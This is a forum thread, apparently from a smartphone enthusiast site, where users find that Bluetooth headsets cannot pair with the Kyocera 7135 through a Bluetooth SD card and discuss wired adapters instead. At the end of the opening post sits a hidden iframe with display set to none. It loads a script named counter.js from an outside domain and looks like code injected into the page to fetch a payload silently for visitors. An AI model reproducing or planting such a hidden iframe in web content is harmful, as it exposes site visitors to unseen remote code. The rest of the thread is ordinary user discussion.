+ Reply to Thread

Bluetooth Headset compatibility

I searched the forum. I have not been able to find a definative answer to this issue. I understand that there does not seem to be an audio profile for the bluetooth stack on this phone (meaning that the BT headset probably won't work). Given that, has anyone tried to use a BT headset with the BT SD card? This is the one feature that I absolutely want with this phone.
    If it does not work, I ani't gettin it!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: Bluetooth Headset compatibility

Originally posted by jabo
    I searched the forum. I have not been able to find a definative answer to this issue. I understand that there does not seem to be an audio profile for the bluetooth stack on this phone (meaning that the BT headset probably won't work). Given that, has anyone tried to use a BT headset with the BT SD card? This is the one feature that I absolutely want with this phone.
    If it does not work, I ani't gettin it!
    There is no BT stack on the phone. It is the BT card(s) that do not have headset the profile. No one has tried it because it won't work.....

The Jabra Freespeak BT with adapter (plugs into the headset jack), clips to your belt, has a long enough coily cord to let you take the phone off your belt without fighting with the adapter) works well. If you search again, you will find several threads were I talk about the quirks of using it with answer/end button emulation.

Alan

You're right but...

I don't know what I was thinking, you're right the BT stack is on the card.
    What I was ineptly refering to was that I had read that the either the audio component of the phone or the the entire phone side does not talk to the BT card. I was hoping that someone tried pairing the headset with one of the existing cards out there while it is in the phone just so I can confirm the "no" answer I'm expecting.

I have the Jabra that I use with a BT enabled Timeport T270c. I realize that I could obviously use it with the 7135 with the adapter but the adapter is too damn big!. The reason I would buy this phone is convergence. Having to haul around an adapter that's a third of the size of the phone ain't cool.

Bluetooth question

Just bought my 7135 last week and already been installing stuff like a mad man. I purchased a Palm Bluetooth SD card off ebay with a bluetooth headset. After installing the bluetooth apps on the 7135 I can't get it to recognize the head set.

Has anyone else tried this?

One thing I did notice, with the Palm software it thinks you're installing this on a Palm handheld. So the option for discovery are - Phone, PC and LAN. Since I'm trying to use this on a phone and discover a headset there really isn't an option for this.

Any help would be appreciated

Islander...
    As I understand it won't work. The 7135 doesn't have the ability to interface with a headset throught the SDIO. Nor are there any bluetooth cards that support a headset profile. Alanb seems to know the skinny on this functionality, or lack ther of.
    mg

Reference:

http://www.smartphonesource.com/vbul...dset#post53467

Thanks for the quick response MGuzzy

My response to all those threads are AHHHHHHHHHHHHHHHH...

I never even thought to check into this prior to purchasing the card and the headset. All I kept hearing from other Bluetooth headset users was how great it worked.

Now I'm out $150 CDN....this sucks

They ARE great when the device supports it. I still know a lot of people tat put up with the little adapters attached to there phones to have the functionality...
    mg
    PS: hey we've been edited and Merged! always vigilant those mods-thanks